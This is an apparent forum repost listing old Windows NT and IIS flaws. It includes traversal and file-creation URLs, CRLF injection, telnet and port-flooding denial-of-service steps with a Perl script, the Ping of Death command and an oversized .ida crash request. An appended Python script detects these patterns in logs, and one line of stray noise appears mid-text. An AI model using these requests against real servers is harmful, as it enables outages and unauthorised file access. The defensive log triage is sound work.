NT vulnerabilities and descriptions (English)

Posted 2011-1-13 17:12:25

Affected systems: 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.
" @+ e( ]" x' h% `+ K
----------------------------------------------------------------------

Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

/*begin poke code*/

use Socket;
use FileHandle;
require "chat2.pl";   # chat2.pl ships with older Perl distributions

$systemname = $ARGV[0] && shift;   # first argument is the host to test

$verbose = 1;    # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
for ($port = 0; $port < 65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    # open the port, send a short string and close it again
    $fh = chat::open_port($systemname, $port);
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

/*end poke code*/

Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server.
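Added example (not part of the original post, and not a tool from the list it quotes): a small Python triage script that looks for the request shapes described above in a few constructed IIS-style log lines, so a defender can spot backslash traversal, '>' redirection under /scripts, %0A%0D injection, .ida/.idq probing and oversized URLs. The client addresses, file names and the 4096-byte length threshold are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (client, method, path, status); the paths mirror
# the request shapes the post describes, but the hosts and files are made up.
SAMPLE_LOG = "\n".join([
    "10.0.0.5 GET /index.htm 200",
    "10.0.0.7 GET /..\\.. 200",
    "10.0.0.7 GET /scripts..\\..\\scriptname 200",
    "10.0.0.9 GET /scripts/exploit.bat>c:\\inetpub\\target.bat 200",
    "10.0.0.9 GET /scripts/script_name%0A%0D>c:\\inetpub\\target.bat 200",
    "10.0.0.11 GET /anything.idq 404",
    "10.0.0.11 GET /" + "." * 25000 + "ida 500",
])

MAX_URL = 4096  # assumed threshold; the '.ida' request in the post is ~25 KB

def classify(path):
    """Return the set of suspicious patterns found in one request path."""
    hits = set()
    decoded = unquote(path)
    # The traversal in the post works because IIS honoured '\' as a
    # separator, so normalise it before looking for a '..' segment.
    normalised = decoded.replace("\\", "/")
    if re.search(r"(^|/)\.\.(/|$)", normalised):
        hits.add("traversal")
    if decoded.lower().startswith("/scripts") and ">" in decoded:
        hits.add("redirect-to-file")
    if "\r" in decoded or "\n" in decoded:
        hits.add("crlf")
    if re.search(r"\.id[aq]$", decoded, re.IGNORECASE):
        hits.add("ida-idq-probe")
    if len(path) > MAX_URL:
        hits.add("oversized-url")
    return hits

def scan_log(text):
    """Map each client address to the union of patterns seen in its requests."""
    findings = {}
    for line in text.splitlines():
        client, _method, path, _status = line.split(" ", 3)
        hits = classify(path)
        if hits:
            findings.setdefault(client, set()).update(hits)
    return findings

if __name__ == "__main__":
    for client, hits in sorted(scan_log(SAMPLE_LOG).items()):
        print(client, sorted(hits))
```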